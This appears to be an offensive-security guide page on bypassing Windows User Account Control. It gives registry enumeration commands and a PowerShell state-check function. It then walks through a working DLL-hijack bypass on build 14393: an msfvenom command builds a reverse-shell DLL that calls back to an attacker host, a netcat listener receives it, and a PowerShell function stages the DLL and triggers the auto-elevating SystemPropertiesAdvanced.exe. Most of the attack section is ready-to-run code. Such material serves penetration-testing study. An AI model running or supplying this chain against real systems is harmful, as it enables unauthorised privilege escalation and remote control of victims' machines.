# User Account Control (UAC) Bypass

> UAC bypasses leverage flaws or unintended functionality in different Windows builds.
>
> The following repository contains many different UAC Bypassing Techniques: <https://github.com/hfiref0x/UACME>

## Initial Enumeration

Check if UAC is enabled (`EnableLUA` = 0x1 means on): `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA`

Check the admin prompt level: `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin`. Note that 0x5 is the *default* ("notify only for non-Windows binaries"), not the maximum: 0x0 elevates silently, and 0x2 combined with `PromptOnSecureDesktop` = 0x1 is the "Always notify" maximum, at which Windows binaries no longer auto-elevate and most bypasses (including the one below) simply produce a prompt

To check the Windows Build: `[environment]::OSVersion.Version`

Check [this](https://github.com/hfiref0x/UACME) repository and see if anything exists for the target build number
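The checks above in one PowerShell function, plus two things the registry cannot tell you: whether the current user is a local admin running on a filtered (medium-integrity) token, and at which integrity level the current shell runs. This is an added example, not code from the original page or from UACME; the function name is an assumption, and it relies only on `Get-ItemProperty`, `whoami /groups`, and `[Environment]::OSVersion`.

```powershell
function Get-UacState {
    # Policy values that define the UAC configuration. Without -Name,
    # Get-ItemProperty returns every value; a missing value is simply $null.
    $pol = Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'

    # ConsentPromptBehaviorAdmin values as documented by Microsoft.
    $behaviour = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }
    $cpba = $pol.ConsentPromptBehaviorAdmin
    $posd = $pol.PromptOnSecureDesktop
    if ($null -ne $cpba) { $meaning = $behaviour[[int]$cpba] } else { $meaning = 'not set (defaults to 5)' }

    # whoami /groups /fo csv exposes the token's group attributes. In a filtered
    # admin token the Administrators SID S-1-5-32-544 is present but marked
    # "used for deny only"; in an elevated token it is enabled. The S-1-16-*
    # row is the integrity label of the current process.
    $groups    = whoami /groups /fo csv | ConvertFrom-Csv
    $adminSid  = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    $integrity = ($groups | Where-Object { $_.SID -like 'S-1-16-*' }).'Group Name'

    # Cross-check the build against the registry, which does not depend on the
    # host process being manifested for Windows 10.
    $regBuild = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuild

    [pscustomobject]@{
        Build                      = [Environment]::OSVersion.Version.Build
        RegistryBuild              = $regBuild
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $cpba
        PromptOnSecureDesktop      = $posd
        AdminPromptMeaning         = $meaning
        # Slider maximum: auto-elevation of Microsoft binaries is off, so
        # bypasses built on auto-elevating executables prompt instead.
        AlwaysNotify               = ($cpba -eq 2 -and $posd -eq 1)
        UserIsLocalAdmin           = [bool]$adminSid
        TokenElevated              = [bool]($adminSid -and $adminSid.Attributes -notmatch 'deny only')
        IntegrityLevel             = $integrity
    }
}
```

Run `Get-UacState | Format-List` from the foothold shell. A UAC bypass is worth attempting only when `EnableLUA` is 1, `UserIsLocalAdmin` is true, `TokenElevated` is false and `AlwaysNotify` is false; if `EnableLUA` is 0 the admin token is already unfiltered and there is nothing to bypass.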

***

## **Example - UAC Bypass in Windows Build 14393**

1. On this build the 32-bit `C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe` auto-elevates and tries to load `srrstr.dll` through the normal DLL search order, which ends with the directories on `PATH`. The user's `%LOCALAPPDATA%\Microsoft\WindowsApps` folder is on that `PATH` and is writable by the user, so a malicious `srrstr.dll` placed there is loaded into the elevated (high-integrity) process. The current user must already be a member of the local Administrators group (running on the filtered, medium-integrity token), and UAC must not be set to "Always notify", otherwise the binary prompts instead of auto-elevating
2. Generate the malicious DLL; the `windows/` (not `windows/x64/`) payload produces a 32-bit DLL, which is what the SysWOW64 binary can load:\
   `msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll`
3. Transfer the DLL to the target and place it in `%LOCALAPPDATA%\Microsoft\WindowsApps` (create the folder if it does not exist yet)
4. Start a netcat listener on the attacker machine, on the port used for `LPORT`: `nc -lvnp 4444`
5. From the medium-integrity shell, run `C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe`; the listener receives a shell in which `whoami /groups` shows `High Mandatory Level`
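The staging and trigger steps above as one PowerShell function that first verifies the conditions the technique silently depends on (UAC level, `WindowsApps` still on `PATH`, DLL actually 32-bit). This is an added example, not code from the original page or from UACME; the function name and the assumed transfer location `C:\Users\Public\srrstr.dll` are not from the original.

```powershell
function Invoke-SrrstrHijack {
    param(
        # Assumed location the DLL was transferred to; adjust to wherever step 3 put it.
        [string]$DllSource = 'C:\Users\Public\srrstr.dll'
    )

    $target = Join-Path $env:LOCALAPPDATA 'Microsoft\WindowsApps'
    $pol    = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
    $build  = [Environment]::OSVersion.Version.Build

    # The page documents build 14393; on other builds the binary may not look
    # for srrstr.dll or may no longer auto-elevate, so warn rather than abort.
    if ($build -ne 14393) { Write-Warning "Build $build differs from the documented 14393" }

    # Nothing to bypass (UAC off), or nothing that can be bypassed silently:
    # at Always notify (ConsentPromptBehaviorAdmin=2, PromptOnSecureDesktop=1)
    # Microsoft binaries no longer auto-elevate.
    if ($pol.EnableLUA -ne 1) { throw 'UAC is disabled; the admin token is already unfiltered' }
    if ($pol.ConsentPromptBehaviorAdmin -eq 2 -and $pol.PromptOnSecureDesktop -eq 1) {
        throw 'UAC is set to Always notify; SystemPropertiesAdvanced.exe will prompt'
    }

    # The hijack only works while the user-writable WindowsApps directory is on
    # PATH; if it has been removed the DLL is never found. -contains is
    # case-insensitive for strings.
    if (-not (($env:Path -split ';') -contains $target)) {
        throw "$target is not on PATH; the DLL would never be found"
    }

    # The DLL is loaded into a 32-bit process, so it must be a PE32 image:
    # e_lfanew at 0x3C, then 4-byte signature + 20-byte COFF header, then the
    # optional-header magic (0x10B = PE32, 0x20B = PE32+).
    $bytes    = [IO.File]::ReadAllBytes($DllSource)
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    $magic    = [BitConverter]::ToUInt16($bytes, $peOffset + 24)
    if ($magic -ne 0x10B) { throw ('{0} is not a 32-bit DLL (magic 0x{1:X})' -f $DllSource, $magic) }

    # Stage and trigger. The folder may not exist until a Store app has been run.
    New-Item -ItemType Directory -Path $target -Force | Out-Null
    Copy-Item -Path $DllSource -Destination (Join-Path $target 'srrstr.dll') -Force
    Start-Process -FilePath 'C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe'

    # Return the staged path so it can be removed once the shell is in hand.
    Join-Path $target 'srrstr.dll'
}
```

Start the listener first, then `$staged = Invoke-SrrstrHijack` from the medium-integrity shell; once the high-integrity callback arrives, `Remove-Item $staged` so the DLL is not loaded again the next time anything on the box resolves `srrstr.dll` through `PATH`.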

